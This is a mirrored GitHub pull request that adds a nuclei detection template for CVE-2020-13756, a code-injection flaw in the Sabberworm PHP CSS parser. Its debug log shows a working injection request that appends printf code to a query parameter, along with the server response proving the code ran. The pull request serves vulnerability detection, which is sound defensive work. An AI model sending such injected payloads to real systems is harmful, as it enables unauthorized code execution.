WARNING: THIS SITE IS A MIRROR OF GITHUB.COM / IT CANNOT LOGIN OR REGISTER ACCOUNTS / THE CONTENTS ARE PROVIDED AS-IS / THIS SITE ASSUMES NO RESPONSIBILITY FOR ANY DISPLAYED CONTENT OR LINKS / IF YOU FOUND SOMETHING MAY NOT GOOD FOR EVERYONE, CONTACT ADMIN AT ilovescratch@foxmail.com
Skip to content

Added CVE-2020-13756 Template #14251

New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

Sign up for GitHub

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Jump to bottom
Open
0xanis wants to merge 5 commits into
base: main
Choose a base branch
from
Open

Added CVE-2020-13756 Template #14251

0xanis wants to merge 5 commits into from

Conversation

@0xanis
Copy link
Contributor

@0xanis 0xanis commented Dec 6, 2025
edited
Loading

/claim #14249

PR Information

Note

Vulnerable environment details shared via email.

Template validation

  • Validated with a host running a vulnerable version and/or configuration (True Positive)
  • Validated with a host running a patched version and/or configuration (avoid False Positive)

Additional Details (leave it blank if not applicable)

Debug

                     __     _
   ____  __  _______/ /__  (_)
  / __ \/ / / / ___/ / _ \/ /
 / / / / /_/ / /__/ /  __/ /
/_/ /_/\__,_/\___/_/\___/_/   v3.5.1

                projectdiscovery.io

[INF] Current nuclei version: v3.5.1 (outdated)
[INF] Current nuclei-templates version: v10.3.4 (latest)
[WRN] Scan results upload to cloud is disabled.
[INF] New templates added in latest release: 0
[INF] Templates loaded for current scan: 1
[WRN] Loading 1 unsigned templates for scan. Use with caution.
[INF] Targets loaded for current scan: 1
[INF] [CVE-2020-13756] Dumped HTTP request for http://localhost:8080/?n=100;printf(%2236SKVL67Ko4iekxgJznUn4TF2FB%22);

GET /?n=100;printf(%2236SKVL67Ko4iekxgJznUn4TF2FB%22); HTTP/1.1
Host: localhost:8080
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:126.0) Gecko/20100101 Firefox/126.0
Connection: close
Accept-Encoding: gzip

[DBG] [CVE-2020-13756] Dumped HTTP response http://localhost:8080/?n=100;printf(%2236SKVL67Ko4iekxgJznUn4TF2FB%22);

HTTP/1.1 200 OK
Connection: close
Content-Type: text/html; charset=UTF-8
Date: Sat, 06 Dec 2025 04:15:54 GMT
Server: Apache/2.4.65 (Debian)
Vary: Accept-Encoding
X-Powered-By: PHP/8.3.28

<br />
<b>Deprecated</b>:  preg_split(): Passing null to parameter #3 ($limit) of type int is deprecated in <b>/var/www/html/vendor/sabberworm/php-css-parser/lib/Sabberworm/CSS/Parsing/ParserState.php</b> on line <b>285</b><br />
<pre>36SKVL67Ko4iekxgJznUn4TF2FB36SKVL67Ko4iekxgJznUn4TF2FB36SKVL67Ko4iekxgJznUn4TF2FB36SKVL67Ko4iekxgJznUn4TF2FB36SKVL67Ko4iekxgJznUn4TF2FBArray
(
    [0] => Sabberworm\CSS\Property\Selector Object
        (
            [sSelector:Sabberworm\CSS\Property\Selector:private] => #test .help
            [iSpecificity:Sabberworm\CSS\Property\Selector:private] => 110
        )

)
</pre>
[CVE-2020-13756:Sabberworm randstr] [http] [critical] http://localhost:8080/?n=100;printf(%2236SKVL67Ko4iekxgJznUn4TF2FB%22);
[INF] Scan completed in 6.448437ms. 1 matches found.
image

Additional References:

@algora-pbc algora-pbc bot mentioned this pull request Dec 6, 2025
Open
@github-actions github-actions bot requested a review from pussycat0x December 6, 2025 04:24
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment

Reviewers

@pussycat0x pussycat0x Awaiting requested review from pussycat0x

Assignees

@ritikchaddha ritikchaddha

Labels

🙋 Bounty claim

Projects

None yet

Milestone

No milestone

Development

Successfully merging this pull request may close these issues.

2 participants

@0xanis @ritikchaddha